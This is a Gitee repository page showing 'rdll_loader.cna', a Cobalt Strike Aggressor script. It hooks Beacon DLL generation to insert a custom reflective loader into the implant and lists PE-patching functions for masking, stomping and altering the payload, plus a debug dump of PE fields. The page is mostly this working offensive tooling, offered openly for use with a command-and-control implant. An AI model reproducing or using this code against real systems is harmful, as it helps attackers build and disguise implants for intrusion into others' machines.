登录 注册
开源 企业版 高校版 私有云 Gitee AI NEW
扫描微信二维码支付
取消
支付完成
Watch
不关注 关注所有动态 仅关注版本发行动态 关注但不提醒动态
1 Star 0 Fork 0

妖道/ElusiveMice

代码 Issues 0 Pull Requests 0 Wiki 统计 流水线
服务
加入 Gitee
与超过 1200万 开发者一起发现、参与优秀开源项目,私有仓库也完全免费 :)
免费加入
文件
该仓库未声明开源许可证文件(LICENSE),使用请关注具体项目描述及其代码上游依赖。
项目仓库所选许可证以仓库主分支所使用许可证为准
克隆/下载
rdll_loader.cna 4.63 KB
一键复制 编辑 原始数据 按行查看 历史
Mariusz B. / mgeeky 提交于 2021-08-27 21:23 . first
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148


# User Defined Reflective Loader Kit Aggressor Script



# Enable Debug of PE content

# The generated PE content will be displayed in the script console if debug is true



#$debug = "true";

$debug = "true";





# ===========================================================================

# 'case insensitive sort' from sleep manual...

# ===========================================================================

sub caseInsensitiveCompare

{

    $a = lc($1);

    $b = lc($2);

    return $a cmp $b;

}



# ===========================================================================

# Dump PE Information

# $1 = Beacon DLL content

# ===========================================================================

sub dump_my_pe {

    local('$out $key $val %pemap @sorted_keys');



    %pemap = pedump($1);



    # ---------------------------------------------------

    # Example listing all items from hash/map...

    # ---------------------------------------------------

    @sorted_keys = sort(&caseInsensitiveCompare, keys(%pemap));

    foreach $key (@sorted_keys)

    {

        $out = "$[50]key";

        foreach $val (values(%pemap, @($key)))

        {

            $out .= " $val";

            println($out);

        }

    }



    # ---------------------------------------------------

    # Example of grabbing specific items from hash/map...

    # ---------------------------------------------------

    local('@loc_cs @val_cs');

    @loc_cs = values(%pemap, @("CheckSum."));

    @val_cs = values(%pemap, @("CheckSum."));



    println("");

    println("My DLL CheckSum Location: " . @loc_cs);

    println("My DLL CheckSum Value: " . @val_cs);

    println("");

}



sub generate_my_dll {



	local('$handle $data $loader $temp_dll');



	# ---------------------------------------------------------------------

	# Load a object file that contains a Reflective Loader.

	# The architecture ($3) is used in the path.

	# ---------------------------------------------------------------------

    $handle = openf(script_resource("/bin/ReflectiveLoader. $+ $3 $+ .o"));

	$data   = readb($handle, -1);

	closef($handle);



	warn("Loaded Length: " . strlen($data));



	if (strlen($data) eq 0) {

		warn("Error loading reflective loader object file.");

		return $null;

	}



	# ---------------------------------------------------------------------

	# extract loader ($loader) from the object file data ($data).

	# ---------------------------------------------------------------------

	$loader = extract_reflective_loader($data);



	warn("Extracted Length: " . strlen($loader));



	if (strlen($loader) eq 0) {

		warn("Error extracting reflective loader.");

		return $null;

	}



	# ---------------------------------------------------------------------

	# Setup the reflective loader ($loader) in the beacon ($2).

	# ---------------------------------------------------------------------

	$temp_dll = setup_reflective_loader($2, $loader);



	# ---------------------------------------------------------------------

	# OPTIONAL: Additional Customization of the PE...

	# 	- Use 'pedump' function to get information for the updated DLL.

	# 	- Use these convenience functions to perform transformations on the DLL:

	# 		pe_remove_rich_header

	# 		pe_insert_rich_header

	# 		pe_set_compile_time_with_long

	# 		pe_set_compile_time_with_string

	# 		pe_set_export_name

	# 		pe_update_checksum

	# 	- Use these basic functions to perform transformations on the DLL:

	# 		pe_mask

	# 		pe_mask_section

	# 		pe_mask_string

	# 		pe_patch_code

	# 		pe_set_string

	# 		pe_set_stringz

	# 		pe_set_long

	# 		pe_set_short

	# 		pe_set_value_at

	# 		pe_stomp

	# ---------------------------------------------------------------------



	println($debug);

	if ($debug eq "true") {

		dump_my_pe($temp_dll);

	}



	# ---------------------------------------------------------------------

	# Give back the updated beacon DLL.

	# ---------------------------------------------------------------------

	return $temp_dll;

}



# ------------------------------------

# $1 = DLL file name

# $2 = DLL content

# $3 = arch

# ------------------------------------

set BEACON_RDLL_GENERATE {

	warn("========== Running 'BEACON_RDLL_GENERATE' for DLL " . $1 . " with architecture " . $3 . " ==========");

	return generate_my_dll($1, $2, $3);

}



# ------------------------------------

# $1 = DLL file name

# $2 = DLL content

# $3 = arch

# $4 = parent Beacon ID

# $5 = GetModuleHandleA pointer

# $6 = GetProcAddress pointer

# ------------------------------------

set BEACON_RDLL_GENERATE_LOCAL {

	warn("========== Running 'BEACON_RDLL_GENERATE_LOCAL' for DLL " . $1 . " with architecture " . $3 . " Beacon ID " . $4 . " GetModuleHandleA " . $5 . " GetProcAddress " . $6 . " ==========");

	return generate_my_dll($1, $2, $3);

}
马建仓 AI 助手
尝试更多
代码解读
代码找茬
代码优化
1
https://gitee.com/xiaocainiao149/ElusiveMice.git
git@gitee.com:xiaocainiao149/ElusiveMice.git
xiaocainiao149
ElusiveMice
ElusiveMice
master
点此查找更多帮助

搜索帮助

Git 命令在线学习 如何在 Gitee 导入 GitHub 仓库
Git 仓库基础操作
企业版和社区版功能对比
SSH 公钥设置
如何处理代码冲突
仓库体积过大,如何减小?
如何找回被删除的仓库数据
Gitee 产品配额说明
GitHub仓库快速导入Gitee及同步更新
什么是 Release(发行版)
将 PHP 项目自动发布到 packagist.org
评论
仓库举报
回到顶部
0d507c66 1850385 C8b1a773 1850385